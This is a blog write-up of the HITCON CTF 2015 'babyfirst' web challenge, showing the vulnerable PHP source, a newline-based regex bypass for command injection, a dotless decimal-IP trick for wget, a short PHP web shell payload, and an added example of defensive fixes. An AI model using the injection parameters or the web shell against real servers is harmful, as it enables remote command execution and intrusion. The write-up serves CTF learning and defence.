
Web 100 baby first

Hitcon Ctf

Posted by Heeraj on October 19, 2015

If you like to read our old blogs you are welcome, I4INFO

This CTF's challenges were very cool; I liked them. I would like to write today about web 100, the "baby first" challenge. I spent most of my time solving this challenge, but I didn't get it.

Source Code:
<?php
highlight_file(__FILE__);                        // shows this source to every visitor
$dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];     // one sandbox directory per client IP
if ( !file_exists($dir) )
    mkdir($dir);
chdir($dir);

$args = $_GET['args'];
for ( $i=0; $i<count($args); $i++ ){
    if ( !preg_match('/^\w+$/', $args[$i]) )     // each argument must be word characters only
        exit();
}
exec("/bin/orange " . implode(" ", $args));      // arguments are joined with spaces and handed to a shell
?>

During the CTF, when I got the problem, the source code was visible because of the highlight_file() function in PHP. After that it had a function to make the directory. But when I deployed the challenge, there was no directory created.

The arguments were passed through the GET parameter, then there is a for loop which loops over the count of arguments. Everything was "ok" till now, except the preg_match(), which was filtering to allow only word characters (letters, digits and underscore). This was a tension; I had to somehow bypass the preg_match() function.

Yes, this was the hard phase, because after this function you have exec(), which executes the command. But in the case here there is /bin/orange, and I don't know what orange was anyway. I was thinking of using && or ; but that would not work.

For bypassing this function, we have to pass the arguments as args[]=a%0A&args[]=touch&args[]=i4info. The trailing newline passes the regex because in PCRE the $ anchor also matches just before a final newline, and the shell then treats that newline as a command separator. So now the problem was, what to do next? You can neither use a dot nor any other command which would help us. The only thing we could do was use the wget command, but for that also you would have to give an IP address which doesn't contain a dot. That's interesting, an IP without dots.

This was a totally new concept: we have to use something called IP resolving, converting the IP to its long (decimal) number format. Thus we can execute the wget command. You could do this all in a folder such that you can make it a tar and execute the PHP from the tar; anyway the PHP will be executed. The exploit to be fetched with wget is given below. It's really a superb problem; the way of thinking that we take is very nice.
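The two tricks above, shown from the fixer's side, as an added example that is not part of the original writeup or the challenge code (function names are my own, the sample inputs are constructed): why the challenge's regex accepts a trailing newline, how the D modifier and escapeshellarg() close that gap, and what the dotless decimal IP form looks like.

```php
<?php
// Added example (not from the original writeup). Function names are my own.

// The challenge's validator: in PCRE, '$' also matches just before a
// final "\n", so "a\n" passes although "\n" is not a word character.
function weak_check(string $arg): bool {
    return preg_match('/^\w+$/', $arg) === 1;
}

// Hardened: the D modifier (PCRE_DOLLAR_ENDONLY) pins '$' to the very end
// of the string; '/^\w+\z/' is equivalent.
function strict_check(string $arg): bool {
    return preg_match('/^\w+$/D', $arg) === 1;
}

// Defence in depth: quote every argument before it reaches the shell, so
// an unexpected byte such as "\n" can never start a second command.
function build_command(array $args): string {
    return '/bin/orange ' . implode(' ', array_map('escapeshellarg', $args));
}

// Constructed inputs: a normal argument, the newline used in the CTF,
// and an argument containing a dot (rejected by both checks).
$samples = ["hello", "a\n", "shell.php"];
foreach ($samples as $s) {
    printf("%-12s weak=%d strict=%d\n", json_encode($s),
           weak_check($s), strict_check($s));
}

// The dotless-IP trick: ip2long() gives the decimal form of an address,
// which wget accepts as a host, so a URL can avoid the forbidden '.'.
$decimal = ip2long('10.0.0.1');
echo "http://$decimal/ is the same host as ", long2ip($decimal), "\n";

// With quoting, the newline stays inside single quotes and cannot
// terminate the first command; this string is safe to hand to exec().
echo build_command(["a\n", "touch", "i4info"]), "\n";
```

Run it with `php example.php`; the weak check reports 1 for "a\n" while the strict check reports 0.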

Exploit:
<?php
file_put_contents('shell.php', '
<?php
header("Content-Type: text/plain");
print shell_exec($_GET["cmd"]);
?>
');
?>

Thank you for reading the blog!